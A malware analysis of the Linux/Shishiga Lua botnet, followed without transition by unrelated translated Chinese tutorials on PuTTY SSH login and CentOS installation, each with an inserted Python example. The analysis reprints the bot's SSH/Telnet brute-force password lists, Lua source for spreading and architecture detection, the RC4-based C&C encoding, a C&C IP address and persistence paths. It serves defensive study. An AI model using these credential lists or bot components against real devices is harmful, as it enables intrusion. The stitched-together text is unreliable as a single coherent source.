Linux/Shishiga malware using Lua scripts

Among all the Linux samples that we receive every day, we noticed one sample detected only by Dr.Web – their detection name was Linux.LuaBot. We deemed this to be suspicious as our detection rates for the Luabot family have generally been high. Upon analysis, it turned out that this was, indeed, a bot written in Lua, but it represents a new family, and is not related to previously seen Luabot malware. Thus, we’ve given it a new name: Linux/Shishiga. It uses 4 different protocols (SSH – Telnet – HTTP – BitTorrent) and Lua scripts for modularity.

How to Meet Shishiga?

Linux/Shishiga targets GNU/Linux systems. Its infection vector is a very common one: bruteforcing weak credentials based on a password list. It does this in a similar fashion to Linux/Moose with the added capability to bruteforce SSH credentials too. Here is the complete credentials list at the time of writing:

bftelnet.lua
[...]
local accounts={
    {"admin","admin"},
    {"root","root"},
    {"adm","adm"},
    {"acer","acer"},
    {"user","user"},
    {"security","security"}
}
[...]
bfssh.lua
[...]
local accounts={
    {"admin","admin"},
    {"root","root"},
    {"adm","adm"},
    {"ubnt","ubnt"},
    {"root",""},
    {"admin",""},
    {"adm",""},
    {"user","user"},
    {"pi","pi"},
}
--[[
    {"acer","acer"},
    {"security","security"},
    {"root","toor"},
    {"root","roottoor"},
    {"root","password"},
    {"root","test"},
    {"root","abc123"},
    {"root","111111"},
    {"root","1q2w3e"},
    {"root","oracle"},
    {"root","1q2w3e4r"},
    {"root","123123"},
    {"root","qwe123"},
    {"root","p@ssw0rd"},
    {"root","1"},
    {"root","12"},
    {"root","123"},
    {"root","1234"},
    {"root","12346"},
    {"root","123467"},
    {"root","1234678"},
    {"root","12346789"},
    {"root","123467890"},
    {"root","qwerty"},
    {"root","pass"},
    {"root","toor"},
    {"root","roottoor"},
    {"root","password123"},
    {"root","password123456"},
    {"root","pass123"},
    {"root","password"},
    {"root","passw0rd"},
    {"root","1qaz"},
    {"root","1qaz2wsx"},
    {"root","asdfgh"},
    {"user","user"},
    {"user",""},
    {"acer","acer"},
    {"security","security"},
    {"root","passw0rds"},
]]
[...]

We found several binaries of Linux/Shishiga for various architectures such as MIPS (both big- and little-endian), ARM (armv4l), i686, and also PowerPC. These are common for IoT devices. We think that other architectures like SPARC, SH-4 or m68k could be supported as we will explain later.

Shishiga’s skills

Linux/Shishiga is a binary packed with UPX 3.91 (Ultimate Packer for Executables), but the UPX tool will have trouble unpacking these binaries because Shishiga adds data at the end of the packed file.

After unpacking, we see that it’s statically linked with the Lua runtime library and stripped of all symbols.

$ file unpacked.i686.lm
unpacked.i686.lm: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped

Once executed, the binary will initialize the malware Lua module with the following methods:

Malware methods
malware_module_methods  dd offset aGetver       ; "getver"
                        dd offset getver
                        dd offset aGetos        ; "getos"
                        dd offset getos
                        dd offset aGetarch      ; "getarch"
                        dd offset getarch
                        dd offset aGetmacaddr   ; "getmacaddr"
                        dd offset getmacaddr
                        dd offset aGetmods      ; "getmods"
                        dd offset getmods
                        dd offset aSetargs      ; "setargs"
                        dd offset setargs

The getmods method returns the archive blob, as we explain later. Then hardcoded Lua code (malware.lua) is executed via the luaL_loadstring and lua_pcall functions. The Lua code is quite straightforward, but here is a quick walkthrough of the source code, without any modifications on our part.

malware.lua
local unistd=require("posix.unistd")
require("malware")

function getexe()
    local fn=unistd.readlink("/proc/self/exe")
    if fn==nil and arg~=nil then
        fn=arg[0] --symlink removed
    end
    if fn==nil then
        print("couldn't find bot file")
        return nil
    end
    local file=io.open(fn,"r")
    if file==nil then
        print("couldn't find bot file")
        return nil
    end
    local data=file:read("*all")
    file:close()
    return data
end

function getMods()
    return zlib.inflate()(malware.getmods())
end

function getScriptFiles(scripts)
    local files={}
    local i=1
    while true do
        local a1,b1,c1=string.find(scripts,'%-%-script%-begin%-%-([%w%.]+)%-%-',i)
        if a1==nil then
            break
        end
        local a2,b2,c2=string.find(scripts,'%-%-script%-end%-%-([%w%.]+)%-%-',i)
        if a2==nil then
            break
        end
        if c1~=c2 then
            return nil
        end
        local src=string.sub(scripts,b1+1,a2-1)
        i=b2+1
        files[c1]=src
    end
    return files
end

malware.exe=getexe() (1)
local modules=getScriptFiles(getMods()) (2)
[...]
f=load(malware.modules['main.lua']) (3)
local s,err=pcall(f)
if s==false then
    print(err)
end
(1) open the malware executable file via /proc/self/exe and return its content;
(2) retrieve the zlib archive via the getmods method, decompress it, parse it using the --script-begin--/--script-end-- tags and store each script in a Lua table keyed by filename;
(3) call the main.lua module.

There is an exhaustive list of all Lua scripts found in the IoCs section. Most of them have self-explanatory filenames, but here is a brief summary of some of them.

callhome.lua

  • retrieve the configuration file server.bt or servers from config.lua;
  • if unable to reach the current default server, change to a different server;
  • send files (reports or accounts, both JSON formatted);
  • execute tasks from task list retrieved from the C&C server;

bfssh.lua / bftelnet.lua

  • module to bruteforce SSH and Telnet logins;
  • check whether the command echo -en "\\x31\\x33\\x33\\x37" outputs 1337; if not, exit, else continue;
  • device architecture is determined from the /bin/ls file by running cat /bin/ls and parsing the ELF header, see below;
  • spread the malware (both .lm and .dm files) according to the device architecture;
  • save successful credentials;

The architecture checking code is as follows:

bfssh.lua, getArchELF method
function bfssh.getArchELF(text)
	local bits,denc,ver,ftype,farch
	if text==nil then
		return nil
	end
	local i=text:find("\x7fELF") (1)
	if i~=nil then
		bits,denc,ver=string.unpack("<BBB",text:sub(i+4))
		if denc==1 then
			ftype,farch=string.unpack("<HH",text:sub(i+16)) (2)
		else
			ftype,farch=string.unpack(">HH",text:sub(i+16))
		end
	end
	return bits,denc,farch (3)
end
(1) every ELF file has to start with \x7fELF
(2) ftype, which represents e_type (ELF file type: executable, shared object, etc.), is not used
(3) bits represents e_ident[EI_CLASS] (32-bit or 64-bit), denc represents e_ident[EI_DATA] (little or big endian), and farch represents e_machine in the ELF header
bfssh.lua, getArchName method
function bfssh.getArchName(bits,denc,farch) (1)
        if farch==0x8 and denc==1 then (2)
                return "mipsel"
        end
        if farch==0x8 and denc==2 then
                return "mips"
        end
        if farch==0x28 then
                return "armv4l"
        end
        if farch==0x2 then
                return "sparc"
        end
        if farch==0x2a then
                return "sh4"
        end
        if farch==0x4 then
                return "m68k"
        end
        if farch==0x14 then
                return "powerpc"
        end
        if farch==0x3 or farch==0x7 or farch==0x3e then (3)
                return "i686"
        end
        return nil
end
(1) bits is not used
(2) check whether the file is for MIPS little endian (e_machine == EM_MIPS and e_ident[EI_DATA] == ELFDATA2LSB)
(3) check whether the file is for Intel 80386, Intel 80860 or AMD x86-64 (e_machine == EM_386 or e_machine == EM_860 or e_machine == EM_X86_64)

config.lua

  • contains publicKey to verify the signature of the binary (.lm or .dm);
  • contains bootstrap nodes list;
  • contains filenames of .bt files, port numbers of SOCKS and HTTP server;
  • contains IP address of the server (probably C&C server);

persist.lua

  • persistence method depending on the privilege (root or user)

scanner.lua

  • used to generate random /16 networks that are not local

worm.lua (this script was removed in the latest version of Linux/Shishiga)

  • allows scanning on a given port;
  • allows upload;
  • gets information from the new infected server;

The readme.lua script has a message banner that grabs your attention, if you speak Russian:

           ВСЁ ИДЁТ ПО ПЛАНУ
А при коммунизме всё будет заебись
Он наступит скоро — надо только подождать
Там всё будет бесплатно,
там всё будет в кайф
Там наверное вощще не надо будет (умирать)
Я проснулся среди ночи и понял, что -
           ВСЁ ИДЁТ ПО ПЛАНУ

This translates to:

            EVERYTHING GOES ACCORDING TO PLAN
When we get communism it'll all be fucking great.
It will come soon, we just have to wait.
Everything will be free there, everything will be fun.
We'll probably not even have to die.
I woke up in the middle of the night and realized
            EVERYTHING GOES ACCORDING TO PLAN

It seems that the malware author was inspired by E. Letov and his album Everything goes according to plan – see the last verse of the title song.

Over the past few weeks, we observed some minor changes like parts of some modules being rewritten, addition of testing modules, removal of redundant files, but nothing especially noteworthy.

While the main binary is named <architecture>.lm, we also managed to retrieve binaries named <architecture>.dm – a simple backdoor that listens on 0.0.0.0 (all IPv4 addresses), port 2015. One of the small changes was the name of this backdoor binary: it changed from .dl to .dm.

Shishiga communication

Linux/Shishiga can communicate using any of the modules httpproto.lua, btloader.lua or server.lua. The httpproto.lua module has functions that encode or decode the given data and make HTTP POST and GET requests. The source code below shows the process of encoding data.

httpproto.lua
[...]
function httpproto.encode(data)
    local msg=bencode.encode(data)
    local c=zlib.crc32()(msg)
    local k=string.pack("<I",utils.random())
    return k..crypto.rc4(k,string.pack("<I",c)..msg)
end
[...]

btloader.lua uses the torrent.lua module (a wrapper for BitTorrent functions) to save or load nodes from the nodes.cfg file. It also retrieves its configuration data from the {server,update,script}.bt files (in Bencode format) and uses the BitTorrent protocol to check for new versions of these files. script.bt allows the execution of a Lua script and update.bt allows executing the .lm binary. Below are examples of decoded .bt files shown as Python dictionaries.

script.bt
{
    'sig': <removed>, (1)
    'k': <removed>, (2)
    'salt': 'script',
    'seq': 1486885364,
    'v': 'caba4dbe2f7add9371b94b97cf0d351b72449072,test.lua\n'
}
(1)signature
(2)public key
update.bt
{
    'sig': <removed>,
    'k': <removed>,
    'salt': 'update',
    'seq': 1486885364,
    'v':
        'bf4d9e25fc210a1d9809aebb03b30748dd588d08,mipsel.lm\n
        8a0d58472f6166ade0ae677bab7940fe38d66d35,armv4l.lm\n
        51a4ca78ebb0649721ae472290bea7bfe983d727,mips.lm\n
        979fb376d6adc65473c4f51ad1cc36e3612a1e73,powerpc.lm\n
        ce4b3c92a96137e6215a5e2f5fd28a672eddaaab,i686.lm\n'
}
server.bt
{
    'sig': <removed>,
    'k': <removed>,
    'salt': 'server',
    'seq': 1486835166,
    'v': '93.117.137.35:8080\n'
}
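As an added example (not code from the write-up or from the bot itself), here is the analyst-side inverse of httpproto.encode together with a parser for the .bt 'v' field, in Python: a captured message is split into its 4-byte key, RC4-decrypted, CRC32-checked and Bencode-decoded. It assumes crypto.rc4 is standard RC4 and bencode.encode is standard Bencode; the sample message is constructed from the script.bt values shown above, wrapped with a fixed key in place of utils.random().

```python
import struct
import zlib

def rc4(key: bytes, data: bytes) -> bytes:
    """Standard RC4 (assumed to match the bot's crypto.rc4); encrypt == decrypt."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def bdecode(buf: bytes, pos: int = 0):
    """Minimal Bencode decoder (int, byte string, list, dict); returns (value, next_pos)."""
    c = buf[pos:pos + 1]
    if c == b"i":
        end = buf.index(b"e", pos)
        return int(buf[pos + 1:end]), end + 1
    if c in (b"l", b"d"):
        items, pos = [], pos + 1
        while buf[pos:pos + 1] != b"e":
            val, pos = bdecode(buf, pos)
            items.append(val)
        if c == b"l":
            return items, pos + 1
        return dict(zip(items[::2], items[1::2])), pos + 1
    colon = buf.index(b":", pos)
    n = int(buf[pos:colon])
    return buf[colon + 1:colon + 1 + n], colon + 1 + n

def httpproto_encode(msg: bytes, k: bytes) -> bytes:
    """Same layout as httpproto.encode: k(4) || RC4_k( crc32(msg) as <I || msg )."""
    return k + rc4(k, struct.pack("<I", zlib.crc32(msg)) + msg)

def httpproto_decode(blob: bytes):
    """Peel off the 4-byte key, decrypt, verify the CRC32, then Bencode-decode."""
    body = rc4(blob[:4], blob[4:])
    (crc,) = struct.unpack("<I", body[:4])
    if zlib.crc32(body[4:]) != crc:
        raise ValueError("CRC32 mismatch: wrong layout or corrupted capture")
    return bdecode(body[4:])[0]

def parse_bt_v(v: bytes):
    """Split a .bt 'v' field ('<sha1>,<filename>\\n' per line) into pairs."""
    return [tuple(line.split(b",", 1)) for line in v.split(b"\n") if line]

# Constructed sample: the script.bt payload from the write-up, bencoded, then
# wrapped with a fixed (constructed) key instead of utils.random().
SAMPLE_MSG = (b"d4:salt6:script3:seqi1486885364e"
              b"1:v50:caba4dbe2f7add9371b94b97cf0d351b72449072,test.lua\ne")
SAMPLE_BLOB = httpproto_encode(SAMPLE_MSG, b"\x13\x37\xc0\xde")
```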

Finally, the server.lua module's main functionality is to create an HTTP server on the port defined in config.lua. In all samples we have analyzed so far, that is port 8888.

The server responds only to /info and /upload requests. Below is a (prettified) version of the server response to the /info path. All of the files below can be easily downloaded from the infected device.

{
    "src":[ (1)
        "test.lua",
        "test1.lua",
        "test10.lua",
        "test2.lua",
        "test3.lua",
        "test5.lua",
        "test6.lua",
        "test_1.lua",
        "test_2.lua",
        "test_3.lua",
        "test_4.lua"
    ],
    "dm":[ (2)
        "armv4l.dm",
        "i686.dm",
        "mips.dm",
        "mipsel.dm"
    ],
    "bt":[ (3)
        "script.bt",
        "server.bt",
        "update.bt"
    ],
    "version":"1.0.0", (4)
    "lua":[ (5)
        "armv4l.lm",
        "i686.lm",
        "mips.lm",
        "mipsel.lm",
        "powerpc.lm"
    ],
    "os":"lin",
    "arch":"i686",
    "lua_version":"Lua 5.3"
}
(1)Lua scripts
(2)backdoor (old name: .dl)
(3)BitTorrent scripts
(4)malware version
(5)modules loader

Querying the root / on port 8888 will result in HTTP/1.0 404 OK, which serves as a simple indicator of compromise (IoC).

http.lua response function
function http.response(req,code,data,timeout)
    timeout=timeout or timeoutDef
    local hdr="HTTP/1.0 %d OK\r\nContent-Length: %d\r\nConnection: close\r\n\r\n"
    async.sendall(req.sock,hdr:format(code,data:len())..data,timeout)
    return true
end

At this point in our investigation, we asked the Censys team to do a mass scan of the Internet on TCP port 8888. They found about 10 IP addresses that match this particular HTTP answer. These IP addresses are potentially infected machines.

Conclusion

At first glance, Linux/Shishiga might appear to be like the others, spreading through weak Telnet and SSH credentials, but the use of the BitTorrent protocol and Lua modules separates it from the herd. BitTorrent used in a Mirai-inspired worm, Hajime, was observed last year, and we can only speculate that it might become more popular in the future.

It’s possible that Shishiga could still evolve and become more widespread but the low number of victims, constant adding, removing, and modifying of the components, code comments and even debug information, clearly indicate that it’s a work in progress. To prevent your devices from being infected by Shishiga and similar worms, you should not use default Telnet and SSH credentials.

We would like to thank the Censys team for their collaboration.

IoCs

C&C

93.117.137.35

SHA-1 hashes (.lm)
SHA-1 hashes (.dl)
Lua’s scripts filename
async.lua
async.lua.old
bencode.lua
bfssh.lua
bfssh.lua.old2
bftelnet.lua
btloader.lua
callhome.lua
callhome.lua.old
config.lua
crypto.lua
dht.lua
event.lua
evs.lua
http.lua
httpproto.lua
libevent2.lua
luaevent.lua
main.lua
main2.lua
malware.lua
persist.lua
readme.lua
routing.lua
scanner.lua
scanner2.lua
server.lua
socket.lua
socks.lua
ssh.lua
ssl.lua
telnet.lua
test.lua
test1.lua
test10.lua
test2.lua
test3.lua
test5.lua
test6.lua
threads.lua
torrent.lua
udp.lua
utils.lua
worm.lua
Files that could potentially indicate an infection
/tmp/.local/*
/tmp/drop
/tmp/srv
$HOME/.local/ssh.txt
$HOME/.local/telnet.txt
$HOME/.local/nodes.cfg
$HOME/.local/check
$HOME/.local/script.bt
$HOME/.local/update.bt
$HOME/.local/server.bt
$HOME/.local/syslog
$HOME/.local/syslog.pid
$HOME/.local/{armv4l,i686,mips,mipsel}.{dl,dm}
$HOME/.local/{armv4l,i686,mips,mipsel,powerpc}.lm
/etc/rc2.d/S04syslogd
/etc/rc3.d/S04syslogd
/etc/rc4.d/S04syslogd
/etc/rc5.d/S04syslogd
/etc/init.d/syslogd
/bin/syslogd
/etc/cron.hourly/syslogd

中国骇客云 teaches you Linux remote login

Linux remote login

Linux is generally used as a server operating system, and servers are generally kept in a data center, so you cannot operate your Linux server at the machine itself.

That is when we need to log in to the Linux server remotely to manage and maintain the system.

On Linux, remote login is provided by the ssh service; the default ssh service port is 22.

Linux remote login clients for Windows include SecureCRT, PuTTY and SSH Secure Shell; this article uses PuTTY as the example for logging in to a remote server.

PuTTY download address: http://www.putty.org/

Once you have downloaded PuTTY, double-click putty.exe and the following window appears.

In the box under Host Name (or IP address), enter the IP of the remote server you want to log in to (you can look up the server's IP with the ifconfig command), then press Enter.

At this point we are prompted for the username to log in with.

Enter root and press Enter, then enter the password, and you are logged in to the remote Linux system.


Remote login to Linux using key authentication

SSH is short for Secure Shell, a protocol specified by the IETF Network Working Group.

SSH is a security protocol built on top of the application and transport layers.

First, generate a key pair with the tool PUTTYGEN.EXE. After opening PUTTYGEN.EXE it looks like the figure below:

The tool can generate keys in three formats: SSH-1 (RSA), SSH-2 (RSA) and SSH-2 (DSA); we use the default, SSH-2 (RSA). "Number of bits in a generated key" is the size of the generated key: the larger this value, the more complex the key and the higher the security. Here we enter 2048.

Then click Generate to start generating the key pair:

Note that during this process you must keep moving the mouse around, otherwise the progress bar will not advance.

At this point the key pair has been generated. You can give your key a passphrase (under Key Passphrase) or leave it empty. Then click Save public key to save the public key and Save private key to save the private key. The author recommends storing them somewhere reasonably safe, both to keep others from peeking and to prevent accidental deletion. Next comes the configuration on the remote Linux host.

1) Create the directory /root/.ssh and set its permissions

[root@localhost ~]# mkdir /root/.ssh
The mkdir command creates directories; it will be covered in detail later, for now it is enough to know what it does.

[root@localhost ~]# chmod 700 /root/.ssh
The chmod command changes file permission attributes; it will also be covered in detail later.

2) Create the file /root/.ssh/authorized_keys

[root@localhost ~]# vim /root/.ssh/authorized_keys
vim is the command for editing a text file; it is likewise covered in detail in a later chapter.

3) Open the public key file you just generated (WordPad is recommended, it is easier on the eyes), copy everything from the line beginning with AAAA up to the line before "---- END SSH2 PUBLIC KEY ----", and paste it into /root/.ssh/authorized_keys, making sure all characters end up on a single line. (You can first paste the copied text into Notepad, edit it into one line, and then paste it into the file.)

A brief note on how to paste: when you open the file with vim it does not exist yet, so vim creates it automatically. Press the letter "i", then press Shift + Insert to paste (or simply right-click), provided the text has already been copied to the clipboard. After pasting, move the cursor to the very beginning of the line, type ssh-rsa followed by a space, then press Esc and type colon wq, i.e. :wq, to save. The format is shown in the figure below:

4) Now set the PuTTY options: click SSH -> Auth in the left pane, click Browse... on the right and select the private key you just generated, then click Open. Enter root and you can log in without entering a password.
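Step 3 above turns PuTTYgen's "Save public key" file (RFC 4716 format) into an OpenSSH authorized_keys line by hand; the following added example (not part of this tutorial) does the same conversion programmatically, reading the key type from the decoded blob rather than assuming ssh-rsa, and installs the line with the 0700 directory and 0600 file permissions that sshd's StrictModes expects (the tutorial sets 700 on the directory but leaves authorized_keys at the default mode). The sample key file is constructed from a toy blob and is not a usable key.

```python
import base64
import os
import struct
import tempfile
import textwrap

BEGIN = "---- BEGIN SSH2 PUBLIC KEY ----"
END = "---- END SSH2 PUBLIC KEY ----"

def ssh2_to_openssh(text: str) -> str:
    """RFC 4716 public key file -> one OpenSSH authorized_keys line."""
    lines = [ln.strip() for ln in text.strip().splitlines()]
    if lines[0] != BEGIN or lines[-1] != END:
        raise ValueError("not an SSH2 public key file")
    headers, b64, cont = [], [], False
    for line in lines[1:-1]:
        if cont or ":" in line:  # header line (base64 never contains ':')
            headers.append(line.rstrip("\\"))
            cont = line.endswith("\\")  # header continued on next line
        else:
            b64.append(line)
    blob = base64.b64decode("".join(b64), validate=True)
    (n,) = struct.unpack(">I", blob[:4])
    keytype = blob[4:4 + n].decode("ascii")  # first SSH string, e.g. ssh-rsa / ssh-dss
    comment = ""
    for h in headers:
        if h.startswith("Comment:"):
            comment = h.partition(":")[2].strip().strip('"')
    return f"{keytype} {base64.b64encode(blob).decode()} {comment}".rstrip()

def install_authorized_key(line: str, home: str) -> str:
    """Append one key line to <home>/.ssh/authorized_keys (dir 0700, file 0600)."""
    ssh_dir = os.path.join(home, ".ssh")
    os.makedirs(ssh_dir, mode=0o700, exist_ok=True)
    os.chmod(ssh_dir, 0o700)  # makedirs honours umask, so force the mode
    path = os.path.join(ssh_dir, "authorized_keys")
    fd = os.open(path, os.O_WRONLY | os.O_APPEND | os.O_CREAT, 0o600)
    with os.fdopen(fd, "a") as f:
        f.write(line.rstrip("\n") + "\n")
    os.chmod(path, 0o600)  # sshd refuses group/world-writable key files
    return path

# Constructed toy "ssh-rsa" blob: type string, e=65537, a 3-byte modulus. NOT a real key.
SAMPLE_BLOB = (b"\x00\x00\x00\x07ssh-rsa" + b"\x00\x00\x00\x03\x01\x00\x01"
               + b"\x00\x00\x00\x03\x00\xab\xcd")
SAMPLE_FILE = "\n".join([BEGIN, 'Comment: "rsa-key-test"']
                        + textwrap.wrap(base64.b64encode(SAMPLE_BLOB).decode(), 64)
                        + [END])

def demo() -> tuple:
    """Convert and install the sample in a throwaway home; return (file mode, contents)."""
    home = tempfile.mkdtemp()
    path = install_authorized_key(ssh2_to_openssh(SAMPLE_FILE), home)
    with open(path) as f:
        content = f.read()
    return os.stat(path).st_mode & 0o777, content
```

On the Linux host itself, `ssh-keygen -i -f pubkey.txt` performs the same RFC 4716 to OpenSSH conversion.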


If you set a Key Passphrase earlier, you will be prompted for it at this point. For better security, everyone is advised to set a Key Passphrase.

中国骇客云 teaches you how to install Linux. Many friends have asked me about it, so let me share it with everyone.

Linux installation

This section introduces the installation of Linux.

This section uses CentOS 6.4 as the example.

CentOS 6.4 download address:

Note: installing a 64-bit Linux system is recommended.

Next you need to burn the downloaded Linux image to a CD or USB drive.

Note: you can also install VMware on Windows and install Linux in a virtual machine.


Linux installation steps

1. First, boot the installer from the CD drive, the USB drive or the Linux ISO file you downloaded.

Explanation of the menu:

Install or upgrade an existing system: install or upgrade the existing system

Install system with basic video driver: use a basic graphics driver during installation

Rescue installed system: enter system rescue mode

Boot from local drive: exit the installer and boot from the hard disk

Memory test: memory check

Note: when installing on a Lenovo E49, choosing the first option caused display problems; switching to the second option, the installation proceeded without issues.

2. Here you can simply click "Skip".

3. The welcome screen appears; click "Next".

4. Select "English (English)", otherwise some text will be garbled.

5. Keyboard layout: select "U.S. English".

6. Select "Basic Storage Devices" and click "Next".

7. When asked whether to discard all data, select "Yes, discard any data" for a new machine.

8. Hostname format: "firstname.lastname" (in English).

9. Network settings: click through in the order shown in the figure.

10. The time zone can be chosen on the map; select "Shanghai" and uncheck "System clock uses UTC".

11. Set the root password.

12. Disk partitioning: be sure to click as shown in the figure.

13. Adjust the partitions; there must be a /home partition, otherwise some software will fail to install.

14. Asked whether to format the partitions.

15. Write the changes to disk.

16. Boot loader installation location.

17. The most important step, the key step of this tutorial and one that other tutorials do not mention: click in the order shown in the figure.

18. Uncheck all options under the following groups:

Applications

Base System

Servers

and configure Desktops as follows,

that is, uncheck the following options:

Desktop Debugging and Performance Tools

Desktop Platform

Remote Desktop Clients

Under Input Methods keep only ibus-pinyin-1.3.8-1.el6.x86_64 and uncheck everything else.

19. Select Languages, tick Chinese Support on the right, then click the red area.

20. After the adjustments it should look like the figure below.

21. With that, a minimal desktop environment has been configured.

22. Installation complete; reboot.

23. After the reboot: License Information.

24. Create User

Username: your English first name (without .lastname)

Full Name: your English firstname.lastname (capitalized)

25. "Date and Time": tick "Synchronize date and time over the network".

After Finish the system will reboot.

26. At the first login, do not change anything before logging in; this is very important!!! Log out immediately after logging in.

At the second login, choose the language: click the small dropdown triangle in the red area, choose Other, and select "汉语(中国)" (Chinese (China)).

27. After logging in, be sure to click in the following order!

With that, the CentOS installation is complete. If you have any other questions, feel free to contact me!!